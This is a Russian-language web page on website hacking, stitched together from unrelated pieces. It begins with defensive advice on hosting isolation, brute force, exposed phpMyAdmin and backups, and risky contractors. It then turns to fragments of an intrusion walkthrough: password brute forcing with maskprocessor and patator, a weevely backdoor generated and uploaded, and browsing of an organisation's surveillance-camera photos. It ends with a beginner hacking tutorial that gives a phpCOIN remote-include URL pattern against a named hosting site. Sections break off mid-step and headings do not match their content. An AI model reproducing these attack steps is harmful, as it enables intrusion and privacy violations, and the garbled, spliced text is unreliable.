Как взламывают сайты —

Как взламывают сайты - Хостинг
На чтение 41 мин Просмотров 60 Опубликовано
Содержание
  1. Что нужно сделать для защиты своего сайта
  2. Почему взламывают даже защищённые cms на безопасном хостинге
  3. .htaccess
  4. . Поиск слабых настроек сервера
  5. . Брут-форс SSH и FTP
  6. Загрузка бэкдора
  7. Осматриваемся на сервере из бэкдора
  8. Анализ добытых паролей
  9. Камеры
  10. Wordfence
  11. Варианты взлома сайтов
  12. Взлом сайта не через веб
  13. Взлом сайта по вине подрядчиков или сотрудников
  14. Взлом хостинга .mx: php инклудинг на практике
  15. Два типа плагинов брандмауэра wordpress
  16. Забытые учетки
  17. О брандмауэре
  18. О проблеме взлом аккаунта сайта и хостинга
  19. Поиск причин
  20. Самый цимес
  21. Фишинг
  22. Выводы про взлом аккаунта сайта
  23. Промежуточный итог
  24. Связанные статьи:
  25. Заключение
  26. Связанные статьи:

Что нужно сделать для защиты своего сайта

  • Грамотно выбирать хостера. Если не хватает компетенции выбрать хостинговую площадку по техническим параметрам самостоятельно, совет — довериться одному из хостеров, входящих в десятку лучших по РФ или СНГ. Например, воспользоваться этой информацией или посмотреть рейтинг хостинговых компаний по числу клиентских доменов. Ведущие хостинг-провайдеры заботятся о безопасности своих клиентов и активно инвестируют в повышение безопасности своих серверов.
  • Нужно всегда помнить про безопасное размещение сайтов на хостинге. Если есть возможность, взять отдельный аккаунт для каждого сайта или разместить на аккаунте минимальное число сайтов, так как это будет более безопасно. Об этом нужно думать в момент размещения сайта на хостинге или при выборе хостинга, так как некоторые хостеры уже имеют встроенный механизм изоляции сайтов внутри виртуальной площадки. Если сайты не изолированы друг от друга (то есть скриптами одного сайта можно вносить изменения в файлы другого) — то велик риск взлома всего аккаунта.
  • Необходимо ограничить подключение по FTP и SSH с помощью дополнительного пароля, например, приходящего по SMS, или предоставить доступ с определенных IP-адресов.
  • Регулярно менять пароли. Чем чаще вы меняете пароли, тем меньше у злоумышленника шансов воспользоваться перехваченными или украденными.
  • Для работы в открытых wi-fi сетях использовать VPN, чтобы избежать перехвата конфиденциальной информации программами-анализаторами трафика — снифферами.

VPN — это отдельный сервис, который покупается на специализированных сайтах: пример. Пользователь скачивает программу, указывет в ней свою учетную запись и далее одной кнопкой включает или выключает безопасную передачу данных между своим компьютером и удаленным сервисом или сайтом.

Почему взламывают даже защищённые cms на безопасном хостинге

Очевидно, что если у сайта есть уязвимости, то его можно взломать с помощью веб-атак. Но даже если сайт защищен техническими средствами, работает на надежной CMS, его все равно могут скомпрометировать. Каким образом это происходит и как защищать сайт от различных вариантов взлома не через веб-уязвимости — oб этом рассказал на

«1С-Битрикс» Григорий Земсков, руководитель компании «

».

С каждым годом растет число взломов и пострадавших от них владельцев сайтов. А в последние два года проблема безопасности сайтов становится особенно актуальной: в разы возросло число атак и объемы входящего опасного трафика, и, как следствие, количество взломанных ресурсов. Видя это, веб-мастеры и владельцы веб-проектов постепенно начинают осознавать проблему и интересоваться вопросами информационной безопасности сайтов, в частности, их защитой. Для того, чтобы грамотно защитить свой ресурс, владелец веб-ресурса должен понимать, какие есть варианты взлома, как действует злоумышленник, какие векторы атак наиболее критичны и как их закрыть.

К сожалению, существует очень много статей и видео, которые вводят в заблуждение интересующихся этими вопросами. Проблема здесь в том, что вопрос безопасности освещается однобоко, обычно рассматриваются только технические средства защиты. Причем не в полном объеме, а только те, которые блокируют веб-атаки. Это дает веб-мастерам чувство ложной защищенности и абсолютно не гарантирует бесперебойную работу веб-ресурса и защиту от несанкционированных изменений. В большинстве случаев у владельца сайта нет желания тратить свои ресурсы: деньги, время на безопасность проекта, поэтому выбирается на его взгляд оптимальная стратегия: использовать популярную коммерческую систему управления сайтом и разместить сайт на популярном хостинге. Все, вроде бы, логично: защищенная система работает в защищенной среде, то есть можно более не думать про безопасность и защиту. Но это всего лишь одно из популярных заблуждений про безопасность сайтов, наряду с тем, что достаточно одних лишь технических мер защиты.

Увы, все эти «мифы» — про использование лишь веб-атак для взлома сайтов, про защищенность CMS и достаточность технических мер, приводят к новым массовым взломам сайтов. Что же делать, чтобы этого не происходило? Необходим комплексный подход к вопросу безопасности сайта. Далее мы рассмотрим, почему нужно уделять постоянное и пристальное внимание как техническим средствам защиты, так и организационным мерам. Это важно хотя бы потому, что существует много вариантов взлома сайтов, которые выполняются нетехническими методами и без использования веб-уязвимостей.

Варианты взлома сайтов

Все варианты взлома сайтов можно условно разделить на три большие группы (выделены жёлтым, голубым и серым цветом):

Как взламывают сайты -

Больше всего говорят и пишут про взломы посредством веб-атак. Поскольку данный аспект освещен достаточно хорошо, в этой публикации я лишь вскользь упомяну о нем, а основной акцент хотелось бы сделать на двух незаслуженно забытых категориях: компрометации ресурсов техническими средствами без использования «человеческого фактора» (желтый блок) и взлом по вине подрядчиков и сотрудников, то есть тех, кто помогает обслуживать сайт. В количественном выражении взломы через веб составляют около 75%, чем и обусловлено столь пристальное внимание к этому классу.

Как взламывают сайты -

Что касается остальных двух, то они не такие популярные, но все же не менее важные. По нашей статистике, на взлом по вине подрядчиков и сотрудников приходится около 5% инцидентов. Но эта цифра постепенно растет, поскольку в настоящий момент много сайтов отдается на обслуживание в веб-студии, диджитал-агентства или фрилансерам.

Итак, рассмотрим варианты по-порядку. Начнем с самой многочисленной группы, взлом сайта посредством веб-атак:

  • В большинстве случаев это становится возможным в результате эксплуатации уязвимостей
    • в скриптах CMS, в плагинах и модулях. Разработчики допускают ошибки: недостаточно фильтруются входные параметры, не проверяются размещаемые в базе данные, информация выводится на странице «как есть», без безопасных преобразований.
    • в доработках. Можно поставить безопасную CMS, но при этом позвать неопытного разработчика. Он допишет плагин, в который внесет иногда не одну критическую уязвимость и через них взломают сайт. Веб-программист должен быть знаком с принципами безопасной разработки, а владельцу сайта следует обращаться к опытным подрядчикам.
  • Второй вариант взлома сайта возможен благодаря брутфорсу панелей администрирования, то есть подбору логинов/паролей. Это очень распространённый тип атаки, особенно на защищенные CMS. По-прежнему пользователи устанавливают короткие или словарные пароли, которые с легкостью перебираются злоумышленниками и могут быть подобраны за конечное время. В результате доступ к админ-панели можно получить буквально за несколько минут. Ситуация усугубляется тем, что доступ в панель администратора обычно не ограничивается дополнительными средствами, такими как двухфакторная аутентификация, разрешенным списком IP-адресов, а число неверных попыток входа не ограничено.

Защита от веб-атак

Избавиться от веб-атак нельзя, но им можно противодействовать. Ниже представлен список мер против взлома через веб.

  1. Необходимо обновлять CMS и скрипты. С каждой новой версией выходят патчи безопасности: закрываются уязвимости, исправляются ошибки. Всё это позволяет снизить вероятность взлома через веб, хотя и не защищает от него на 100%, потому что и в новых апдейтах, к сожалению, могут появиться новые «дыры».
  2. Необходимо минимизировать объем плагинов в CMS. Чем больше плагинов, тем больше вероятность наличия уязвимостей. В идеале, использовать решение «из коробки», с примененными патчами и критическими обновлениями, которые закрывают все известные публичные уязвимости в ядре CMS. Но, поскольку, функциональности не всегда хватает, то перед установкой плагинов нужно обязательно проверять, насколько они защищены и безопасны.
  3. Доработки нужно отдавать опытным веб-разработчикам, которые имеют представление о безопасности сайтов и источниках проблем, то есть понимают необходимость фильтрации входных и выходных параметров, безопасных алгоритмов аутентификации и авторизации, безопасного хранения данных и т.п.
  4. Трафик необходимо фильтровать. По статистике сервисов проксирования трафика, около 50% всех запросов идут от ботов, причем примерно четверть тех запросов – это атаки на веб-ресурс. Фильтрация запросов к сайту блокирует атаки, паразитный трафик и снижает нагрузку при DDOS- и брутфорс-атаках. Фильтровать можно как с помощью внешнего сервиса (Web Application Firewall/AntiDDOS), так и модуля веб-сервера (naxsi/mod_security). Еще одна полезная функция WAF – это виртуальный патчинг уязвимостей. Необязательно (да и не всегда возможно) ставить «заплатки» на скрипты, но WAF может выполнять виртуальный патчинг, то есть на лету блокировать опасные запросы, не давая эксплуатировать уязвимость. Кроме сервиса и модуля веб-сервера, файрвол бывает встроен в CMS. Он, конечно, не может быть полноценной заменой внешних сервисов WAF или AntiDDOS, но частично снижает вероятность взлома в результате веб-атак.
  5. Необходимо использовать плагины и сервисы для защиты от брутфорса. Скажем, установленный на VPS Fail2ban через несколько неудачных попыток авторизации на некоторое время блокирует клиента. Это существенно затрудняет и растягивает во времени подбор пароля.

Некоторые веб-мастера уже применяют перечисленные технические средства и меры защиты, и потому считают свои сайты неуязвимыми. Но, увы, сайт все равно могут взломать и завирусовать.

Если CMS неуязвима

Почему взламывают даже неуязвимые CMS на безопасном хостинге? Причина кроется в том, что существуют и другие варианты компрометации или заражения сайтов, совсем не обязательно, что сайт взломают через уязвимости в скриптах. Приведу несколько из них:

  • Из нашей практике, самый популярный вариант — это взлом через «соседей» по аккаунту. Например, на виртуальном хостинге размещен сайт, безопасности которого уделяется большое внимание: он работает на обновленной версии CMS, к нему применены технические средства защиты. Но на том же shared-аккаунте может быть размещено еще два десятка сайтов с уязвимыми версиями CMS, или размещаться старая тестовая версия сайта, про которую все давно забыли, а в ней может быть открыт загрузчик файлов или доступна без аутентификации админ-панель. Подобные незащищенные сайты и являются источниками проблем безопасности. Через их уязвимости можно внедрить администратора сайта в базу данных, загрузить веб-шелл или бэкдор, а затем получить полный контроль над аккаунтом хостинга. Почему это возможно? На shared-аккаунтах, где нет физической изоляции сайтов друг от друга, все данные расположены внутри общего файлового пространства (у файлов аккаунта общий пользователь операционной системы), то есть скрипты одного сайта могут читать, изменять, удалять скрипты, шаблоны и базу данных другого сайта на том же аккаунте. Это является причиной массовых взломов сайтов на аккаунте, когда однотипное заражение наблюдается на всех ресурсах виртуальной площадки.

    Это касается не только виртуальных хостингов, но и VPS-серверов. Часто, даже при технической возможности и абсолютной дешевизне, на выделенном сервере создается один административный аккаунт (пользователь admin), и внутри него размещается несколько десятков сайтов на различных CMS. А для взлома всего аккаунта достаточно иметь одну единственную критическую уязвимость на любом из этих сайтов. За пару секунд на каждый сайт будет загружено несколько десятков вредоносных скриптов, а процесс лечения будет напоминать вычерпывание воды из дырявой лодки: с одного сайта убрали вредоносный код, а он с другого опять «перешел» на вылеченный. Поэтому одно из базовых правил безопасности сайтов – изолированное размещение сайтов.

  • Следующий вариант взлома защищённого сайта — брутфорс SFTP/FTP-аккаунтов или SSH-доступов. Для своего удобства и к радости злоумышленников веб-мастера устанавливают слабые словарные пароли, которые попадают в ТОП-100, ТОП-1000 популярных и подбираются за пару часов.
  • Третий вариант — взлом через phpMyAdmin (а также другие инструменты, которыми пользуются веб-разработчики и администраторы). PhpMyAdmin — это средство администрирования базы данных. Распространяется по open source-лицензии, удобный, простой, доступный, его ставят на все хостинги и выделенные сервера под управлением популярных панелей. Самое интересное, что адрес у него почти всегда фиксированный. То есть можно набрать или /phpmyadmin, и откроется форма авторизации phpmyadmin. Если туда ввести пароль и логин от базы данных, которые можно узнать различными методами, вы получите доступ к базе данных. А дальше с помощью SQL-запроса можно внедрять вредоносный код в шаблоны, читать или создавать файлы на диске. А это уже могут быть бэкдоры, позволяющие загружать произвольные файлы и выполнять произвольный код. Многие хакеры напрямую внедряют код в базу данных, и при этом не оставляют никаких следов в файловой системе. То есть владелец сайта или веб-мастер просто не поймет, каким образом вирус появляется в коде страницы.

    На самом деле, он, порой, даже не знает о существовании phpMyAdmin, его публичной доступности и возможности взлома сайта через него.

    У читателя может возникнуть вопрос: каким образом злоумышленник узнает логины и пароли от базы данных, ведь для этого нужно получить доступ к файлу конфигурации CMS? На самом деле, получить данные для подключения к БД намного проще, чем кажется. Иногда запрос в поисковую систему Google позволяет найти очень много проиндексированных файлов, содержащий различную «чувствительную» информацию. Например, бэкапы сайтов с файлом настроек, или ошибочно проиндексированные файлы конфигурации. В качестве примера можно взять один старый запрос из Google Hacking Database – хакерской базы данных, содержащей запросы к Google для поиска проиндексированных уязвимых скриптов и чувствительных файлов.

    Как взламывают сайты -

    Вводим его в строку поиска и получаем примерно 288 тыс. файлов, которые содержат открытый логин, пароль, хост. Остается просто взять их оттуда, зайти на страницу /myadmin (или аналогичную для конкретного хостинга) и авторизоваться для проведения операций с базой данных.

    Второй вариант простого получения пароля от базы данных — это поиск бэкапов. Злоумышленник может получить несанкционированный доступ к резервным копиям сайта, если они лежат в корневом каталоге сайта (часто их называют backup.zip, backup.tar.g и т.п.) или в случае небезопасной настройки веб-сервера, когда каталог backup открыт для чтения по прямой ссылке (а иногда его даже индексирует поисковик). То есть злоумышленники по каким-то фиксированным путям (в WordPress это wp-content/uploads или /backups) могут перебрать различные имена файлов и выгрузить бэкап сайта. В этом архиве находится конфигурационный файл, в котором хранятся необходимые доступы к базе данных.

  • Еще один вариант заражения сайта – когда веб-мастер добровольно устанавливает зараженный компонент. Например, вместо покупки плагина или шаблона для сайта, он скачивает этот же архив с «варезных» сайтов или каталога тем. А в этом плагине уже «вшит» бэкдор или вредоносный код. Естественно, через некоторое время такой сайт взламывают.
  • И последний вариант, редко встречающийся у крупных хостеров, но периодически возникающий среди владельцев выделенных серверов – это «рутование» сервера (взлом сервера и получение административных полномочий). Это возможно в том случае, если программное обеспечение, компоненты операционной системы и сервисы содержат уязвимости или ошибки настройки. Если VPS-сервер не администрируется специалистом, то его достаточно быстро взламывают через известные уязвимости, а затем уже, как следствие, взламывают и все находящиеся на нем сайты.
Читайте также:  Возможности протокола RDP: улучшение удаленного доступа и совместной работы

Подытожу способы взлома не через веб:

  1. Перехват или кража доступов, то есть компрометация доступов к сайту.
  2. Брутфорс-атака на сервисы: SFTP, FTP, SSH или административную панель хостинга.
  3. Взлом сайтов через «соседей».
  4. Компрометация сервера хостинга, то есть получение несанкционированного доступа через уязвимости или ошибки настройки.

Защита от взлома

Как от этого защищаться?

  1. Нужно правильно подбирать хостера, обращать внимание на используемые технические средства и сервисы, на наличие изоляции сайтов внутри аккаунтов. Всё это значительно снижает вероятность взлома.
  2. Размещайте сайты изолированно. Не экономьте на безопасности, не ленитесь создавать для сайтов отдельные аккаунты. В идеале нужно размещать каждый сайт на отдельном аккаунте. Если это сервер, также создавайте для каждого сайта отдельный пользовательский аккаунт. Сейчас даже можно найти хостинг-компанию, у которой сайты размещаются изолированно внутри shared-аккаунта. Таких не много, но они есть.
  3. Используйте ограничение по IP или двухфакторную аутентификацию при входе в панель управления, при работе с FTP и SSH. Нужно обязательно устанавливать дополнительную защиту, то есть ограничивать доступ только для доверенного круга лиц.
  4. Регулярно меняйте пароли. Очевидный совет, которому следуют единицы. Это защищает во многих случаях, даже при компрометации доступов. Если злоумышленник не успел ими воспользоваться, то регулярная смена паролей позволяет сохранить свой доступ к сайтам. Дело в том, что вы не знаете, был ли факт компрометации и исходить нужно из пессимистичного сценария. Поэтому в качестве превентивной меры необходимо регулярно устанавливать новые пароли.

    Кроме того, важно не просто их менять, а иметь некую разработанную политику безопасности, определяющую процедуру смены паролей с точки зрения частоты и стойкости. Это должен быть спланированный и поддерживаемый процесс.

  5. При работе с сайтом по FTP/в админке используйте VPN для предотвращения перехвата доступов, чувствительных и конфиденциальных данных.
  6. Забудьте про FTP и заблокируйте его на хостинге, так как он небезопасен. Если на аккаунте есть такая возможность, подключите SFTP — это надстройка над SSH-протоколом для работы с файлами. В настоящий момент он поддерживается практически на всех хостингах. С точки зрения работы с файлами, разницы с FTP вы не заметите, а с точки зрения безопасности – разница колоссальная.
  7. Если вы очень часто пользуетесь какими-то функциями в панели управления, то создайте отдельный аккаунт с ограниченной функциональностью и вынесите эти популярные функции в этот аккаунт. Если у вас его и взломают, то получат только ограниченный доступ к управлению сайтами.

Когда виноват подрядчик или сотрудник

Порой «уязвимостью», через которую взламывают и заражают сайт, является сам человек. В частности – сотрудники и подрядчики, обслуживающие сайт: контент-менеджеры, SEO-специалисты, веб-разработчики. Какие проблемы безопасности подстерегают владельца сайта в этом случае?

  1. Недобросовестный подрядчик. Часто бывают ситуации, когда сайты отдаются на обслуживание фрилансерам, которые не всегда добросовестны. Например, есть вероятность, что в результате сотрудничества ему что-то не понравится, покажется мало денег, он обидится на критику и начнет шантажировать владельца сайта доступами. Или он просто использует свои полномочия администратора и повредит сайт. Поскольку у подрядчика есть полный контроль над сайтом, он может внедрить на страницы вредоносный код, может начать продавать на нем ссылки с биржи Sape.ru/Trustlink/и пр., размещать несанкционированную рекламу. И порой владелец сайта или менеджер проекта не догадываются, что бывший веб-мастер «паразитирует» на веб-ресурсе, оставив на нем свои «закладки».
  2. Бывает, что подрядчик устанавливает плагины, которые содержат уязвимости или бэкдоры. Например, владелец сайта находит красивый плагин галереи для сайта и просит фрилансера купить и настроить этот модуль. Фрилансер находит такой же плагин на «варезном» сайте, берет деньги с заказчика на покупку, но на самом деле скачивает бесплатно. В «нулленом» варианте будет присутствовать некая «полезная» нагрузка в виде бэкдора или «черных» seo-ссылок. Владелец сайта об этом скорее всего никогда не узнает, потому что не будет проверять то, что установил фрилансер.
  3. Утечка доступов — тоже очень серьезный момент, потому что часто подрядчики не задумываются о безопасности клиентских доступов и сайтов, и небрежно ими распоряжаются. Например, крупное диджитал-агентство обычно работает по различным задачам с партнерами (субподрядчиками), которым передаются клиентские доступы, и что с ними делают партнеры, никто не знает. Эти доступы могут передаваться открыто через мессенджеры по небезопасному сетевому подключению, сохраняться в текстовых файлах, храниться в различных незащищенных CRM и т.п. В итоге шансов раскрытия данных доступов масса, и достаточно сложно будет найти причину компрометации.

    Самый живой пример — это когда такой партнер крупного диджитал-агентства сидит в кафе, обновляет сайт по FTP, а где-нибудь рядом с ним устроился хакер, который перехватывает трафик в той же WIFI сети. Или роутер, через который работает специалист в коворкинг-кафе, заражен трояном. Вредоносное ПО собирает все эти доступы и передает злоумышленникам. Сейчас подобное уже не редкость, перехват траффика в открытых сетях – операция очень простая и эффективная. Поэтому работать в публичном месте без активного VPN – это почти преступление.

  4. И последний вариант — использование социальной инженерии. Скажем, подрядчику, приходит фишинговое письмо: «Ваш сайт взломали! Пожалуйста, срочно смените пароль!» и ссылка. Напуганный исполнитель в замешательстве кликает по ссылке, ему открывается знакомая форма авторизации CMS, но он не замечает, что страница загружена с подставного сайта злоумышленника. Вводит пароль и последний благополучно отсылается хакеру.

Что делать? Как защититься?

Для защиты от подобных инцидентов и проблем владелец сайта наряду с техническими средствами должен внедрять и организационные меры защиты.

  1. Управлять доступами. Владелец должен знать, когда и как их менять, у кого они есть, кому их передавать и в каком объеме. Это защитит от многих проблем.
  2. Проводить аудит безопасности после выполнения работ подрядчиком. Файлы, базу и страницы сайта можно проверить самостоятельно с помощью доступных сканеров или инструментов для контроля целостности, а можно обратиться к соответствующим специалистам по безопасности.
  3. Инструктировать подрядчиков. Обязательно нужно составить руководство по безопасной работе с сайтом для сотрудников и подрядчиков и проинструктировать по нему. Многие специалисты могут отлично выполнять свои задачи, но не задумываться о безопасности сайта.
  4. Работать по договору и с проверенными компаниями. Сотрудничество с фрилансерами часто оборачивается проблемами безопасности с сайтом.

В заключение

Безопасность – это непрерывный процесс, которому требуется пристальное внимание. Только в случае комплексного подхода к безопасности, включающего в себя обязательное использование технических средств и организационных мер, ваш сайт будет надежно защищен.

.htaccess

Ну и конеч­но же, нель­зя не ска­зать о том, что вла­дель­цы сай­тов зачас­тую оставля­ют дос­тупны­ми на чте­ние некото­рые дирек­тории. В том же WordPress чаще все­го мож­но попасть в эти слу­жеб­ные пап­ки:

  • /wp-content/;
  • /wp-content/plugins/;
  • /wp-content/themes/;
  • /wp-content/uploads/files/;
  • /images/.

Оче­вид­но, что делать там пос­торон­ним совер­шенно нечего, пос­коль­ку в таких пап­ках может хра­нить­ся кри­тич­ная информа­ция, в том чис­ле доволь­но‑таки кон­фиден­циаль­ная.

Содержимое папки /uploads/files/ одной государственной больнички
Со­дер­жимое пап­ки /uploads/files/ одной государс­твен­ной боль­нич­ки

Зап­ретить дос­туп к слу­жеб­ным пап­кам мож­но, опять же уста­новив соот­ветс­тву­ющий шаб­лон, или самым прос­тым спо­собом — помес­тить в кор­не каж­дой дирек­тории пус­той файл index.html (либо добавить в .htaccess сай­та строч­ку Options All -Indexes).

Кро­ме того, нуж­но осмотри­тель­но обра­щать­ся с коман­дой chmod, осо­бен­но при раз­даче прав куче вло­жен­ных дирек­торий на запись и выпол­нение скрип­тов. Пос­ледс­твия таких необ­думан­ных дей­ствий могут быть самыми неожи­дан­ными.

Читайте также:  Обновите DiskStation с помощью новейшей BIOS для обеспечения превосходной производительности

. Поиск слабых настроек сервера

Итак, из веб-сайтов мы уже вытрясли всё, что только можно, — исходный код, базы данных, пароли пользователей.


Теперь давайте осмотримся на самом сервере — к чему у нас есть доступ, какие настройки являются слабыми, какую информацию мы можем получить о системе, пользователях, запущенных службах.

Всё это можно делать вручную запуская утилиты в командной строке или воспользоваться одной из программ автоматизации. Например, я применю LinEnum. Подробности работы с ней описаны в «Аудит безопасности хостинга и других совместно используемых систем на Linux».

Скачиваем её:

. Брут-форс SSH и FTP


На сервере были найдены два пользователя с правами администратора, root и ещё один, имя которого привести не могу.

Анализ исходного кода веб-интерфейсов для просмотра сохранённых с камер фотографий дал ещё один пароль — тоже из шести цифр. Я обратил внимание, что владельцем папок веб-сервера, где расположены фотографии, является не Apache (не www-data), а разные пользователи.

Оказалось, что для них предусмотрены учётные данные FTP, а также для под ними можно входить по SSH, причём в обоих случаях подходит пароль администратора, который подходит и для root MySQL, и для сервиса на сайте. К сожалению, у этих пользователей нет прав на выполнение команд с sudo.

Но, что самое печальное, что этот самый пароль администратора не подходит к пользователю системы Linux, также не подходит к учётной записи root. Если честно, я сначала даже удивился — ко всему подходит, а к этому не подходит… Видимо, пароли для этих пользователей придумывали на аутсорсе…


Будем исходить из того, что пароль всё-таки из шести цифр. Тогда сгенерируем его с помощью maskprocessor:

maskprocessor ?d?d?d?d?d?d > dig.pass

Для брутфорса я предпочитаю patator.

Я хотел запустить подбор пароля прямо с самого сервера. Python там оказался установленным, но не оказалось paramiko, поэтому я получил ошибку:

Загрузка бэкдора

В начале я хотел воспользоваться самым простым вариантом — c99unlimited.php. Это шелл в фиде файлового менеджера и в нём удобно бродить по каталогам и скачивать файлы. Но у меня он не заработал — выдал ошибку 500. Видимо, у сервера с ним какая-то несовместимость.

Это абсолютно не проблема, разнообразных шеллов в Webshells очень много — можно долго сидеть и выбирать тот, который понравится, но я решил воспользоваться ещё более любимым Weevely. У меня к этому инструменту ещё более чувства )))) Хотя у него интерфейс командной строки — так мне нравится даже больше.

Создаём новый бэкдор (да, пароль просто цифра 1):

weevely generate 1 test.php

Заливаем его на сервер.

И подключаемся к нему:

Осматриваемся на сервере из бэкдора

Примечание: для лучшего понимания происходоящего, рекомендуется к знакомству цикл статей «Азы работы в командной строке Linux (часть 1)».

После подключения, Weevely показал, что я нахожусь в папке /var/www/XX1/tmp.

Можно дополнительно в этом убедиться:

pwd
/var/www/XX1/tmp


Посмотрим, какие у меня права на эту папку:

ls -dl .

Вывод:

drwxrwxrwx 2 XX1 root 4096 Apr 21 14:16 .

Из этой информации следует, что владельцем папки является пользователей XX1. Но права на запись есть вообще у всех.


Кстати, а кто там я?

whoami

Вывод:

www-data

Я работаю от пользователя www-data.

Анализ добытых паролей

База данных раскрыла много интересной информации. Но самая интересная — это список пользователей с паролями.

У нас есть имена пользователей и пароли (а также email’ы и другая типичная для профилей информация). Пароль администратора для входа на сервис точно такой же, как и пароль пользователя root от MySQL. Напомню, если вы запутались: пароль от MySQL мы нашли в исходном коде файлов сайта, а пароль админа сервиса (сайта) мы нашли в базе данных. Хотя они оказались одинаковыми smiley


Это важно — пользователь имеет тенденцию использовать одинаковые пароли — это отдельная уязвимость, между прочим.

Но ещё интереснее анализ всех паролей пользователей — почти все они шестизначные числа! Видимо, учётные данные генерировал и выдавал администратор. У администратора склонность создавать однотипные пароли — учтём это. То есть если придётся брут-форсить службы на этом сервисе (а нам придётся devil

Камеры

Без камер сейчас никуда: в комнате отдыха воруют печеньки, на рабочих местах работники не работают, в туалетах промахиваются мимо писсуара… Эта организация тоже не исключение. Я не просто так в первой части показал, как проверять размер папок и как выборочно архивировать папки веб-сервера.

Два хоста оказались хранилищем фотографий на десятки гигабайт. Там всё пристойно, единственное что, камеры со встроенным датчиком движения, поэтому запись происходит только когда в комнате кто-то есть. Одна из камер установлена в комнате отдыха — там где чаёк, еда, телевизор.

Так вот, если на ускоренном темпе просматривать эти фотографии (получается как видео), то создаётся сюрреалистическое впечатление, что люди в этой организации без конца жрут… День проходит так: восходит солнышко, заходят первые люди и начинают пить кофе, затем начинают есть, затем они уходят и начинают есть другие, затем приходят ещё больше людей и тоже начинают есть, потом эти уходят и приходят другие со своей едой и опять едят, и это повторяется и повторяется пока не наступит закат… Затем следующий день — точно такой, люди едят-едят-едят и вот такого почти на 100 Гигабайт…

Причём веб-интерфейс со слабым паролем для просмотра всего этого «добра» расположен на поддомене сайта, доступного из Глобальной сети.

Wordfence

Мой любимый бесплатный плагин безопасности WordPress со встроенным фаерволом веб-приложений. Плагин сканирует сайт WordPress на наличие вредоносных программ, изменения файлов, SQL-инъекций и т.д. Есть защита от DDoS-атак.

Wordfence после запуска и настроек блокирует опасный трафик блокируется после вашего веб-сервера, до загрузки сайта. В бесплатной версии плагин не имеет CDN услугу, а значит не защитит от увеличения нагрузки на ваш веб-сервер.

Варианты взлома сайтов

Рис.1 — Варианты взлома сайтов

На рисунке (Рис.1) мы сгруппировали практически все возможные варианты взлома, которые делятся на три категории:


Самая многочисленная категория относится ко взлому сайтов через веб. (Рис.2):

Рис.2 — Способы взлома сайтов по частоте использования

На неё приходится порядка трёх четвертей от всех возможных вариантов несанкционированных вторжений. Именно поэтому об этом так много пишут и говорят. Именно поэтому веб-мастера и владельцы сайтов обращают внимание на закрытие уязвимостей и обновление плагинов и CMS до актуальной версии. И именно поэтому считают, что если данное условие выполнено, то их сайту ничего не угрожает.

Однако это далеко не так.

Взлом сайта не через веб


Взлом сайта не через веб-уязвимости представлен довольно большим классом технических «возможностей» для злоумышленников:

Перехват или кража доступов. Необязательно, что эти доступы украдут именно у вас. Зараженный трояном компьютер, с которого удалённо работает ваш приходящий бухгалтер, или небезопасное подключение к wi-fi фрилансера, который решил внести правки на ваш сайт, находясь в коворкинге, могут стать причиной кражи доступов от сайта и хостинга.

Работа по wi-fi в общественных местах — отдельная возможность для взлома. Вы никогда не знаете, кто сидит за соседним столом и не «снифферит» (перехватывает) ли этот кто-то трафик, чтобы воспользоваться собранной информацией в недобропорядочных целях.

Взлом сайта по вине подрядчиков или сотрудников


Вы передаёте доступы к сайту и хостингу своему подрядчику для выполнения каких-то работ. Подрядчик действует быстро и профессионально: желаемые изменения на сайт внесены, сайт снова работает, как часы.

Но через некоторое время вы замечаете, что трафик снижается, а в статистике сайта появляются переходы на сторонние сайты. Что случилось? Не спешите подозревать веб-мастера, что он сделал это целенаправленно. Возможно, произошла кража доступов или его компьютер был заражен (о чём мы писали ранее).

Здесь правила очень просты: хотите управлять безопасностью своего сайта при работе с подрядчиками — управляйте доступами к веб-ресурсу. Что это значит?

  • Предоставляйте доступы подрядчикам на минимальный срок и с минимальными привилегиями. То есть, если фрилансеру нужно поправить какой-то шаблон на сайте, не стоит ему давать root-пароль от сервера. Достаточно дать SFTP или SSH доступ, создать пользователя с минимальными, но достаточными правами и предоставить SFTP-подключение в каталог, где лежит указанный шаблон.
  • Возьмите за правило проводить аудит сайта, после того как подрядчик выполнил все работы. Это можно сделать самостоятельно после выполнения работ путем сравнения файлов или с помощью привлеченных сторонних специалистов.
  • Для самостоятельной проверки сайтов мы рекомендуем использовать бесплатные сканеры вредоносного кодаAI-BOLIT и веб-сканер ReScan.pro. Они помогут быстро проверить сайты на вирусы и вредоносный код.
  • Работайте на договорной основе, сотрудничество на «честном слове» может неприятно разочаровать.
  • Инструктаж подрядчиков — необходимая составляющая комплекса мероприятий по безопасной работе с веб-ресурсом. Часто, когда задачу нужно сделать быстро — например, срочно поправить что-то в шаблонах или скриптах — правила безопасности могут игнорироваться, а в результате владелец сайта столкнется с неприятными последствиями. Не забываем, что сотрудника можно обмануть и он добровольно передаст доступы третьим лицам.

Самый яркий случай из нашей практики был связан с передачей доступов от хостинга секретаршей компании клиента. Злоумышленники представились техподдержкой, обслуживающей сайты компании, и, ссылаясь на срочность выполнения одной из задач по просьбе руководства, обманным путем смогли получить пароль от аккаунта хостинга.

В современных условиях агрессивного интернета владельцам сайтов чрезвычайно важно выработать для себя политику безопасности при работе с веб-ресурсом. И речь идет не только о технических мерах, но и организационных — это и правила работы с подрядчиками, и правила работы с сайтом внутри компании. Часто этой самой «уязвимостью» вашего сайта является сам человек.

И в заключение — старайтесь сделать процесс обеспечения безопасности сайта как можно более удобным для вас и ваших сотрудников (чтобы это было не сильно сложно / затратно по времени / скучно и так далее). Иначе инструкция будет говорить одно, а люди через некоторое время всё равно будут её игнорировать.

Мнение редакции может не совпадать с мнением автора. Если у вас есть, что дополнить — будем рады вашим комментариям. Если вы хотите написать статью с вашей точкой зрения — прочитайте правила публикации на Cossa.

Взлом хостинга .mx: php инклудинг на практике

Эта статья будет интересна в первую
очередь начинающим хакерам. В ней я
попытаюсь объяснить как применять php
инклудинг.

Сидя вечером 20 декабря Интернете я прочитал
о только что найденной уязвимости в форуме
phpCOIN. Статья называлась «PHP-инклудинг
в phpCOIN v.1.2.2″ Вот как выглядит данная
уязвимость:

http://[target]/[path]/config.php?_CCFG[_PKG_PATH_DBSE]=http://[location]

Затем я пошел на www.altavista.com, набил для поиска
phpCOIN 1.2.2 и стал разгребать найденные ссылки.
И решил остановиться на сайте www.bajahosting.com.mx.
На нем висел дырявый форум www.bajahosting.com.mx/phpcoin.

Приводим строку к виду http://www.bajahosting.com.mx/phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=

Видим:
Warning: main(db_mysql.php): failed to open stream: No
such file or directory in /home/ameza/public_html/phpcoin/coin_includes/db.php
on line 37
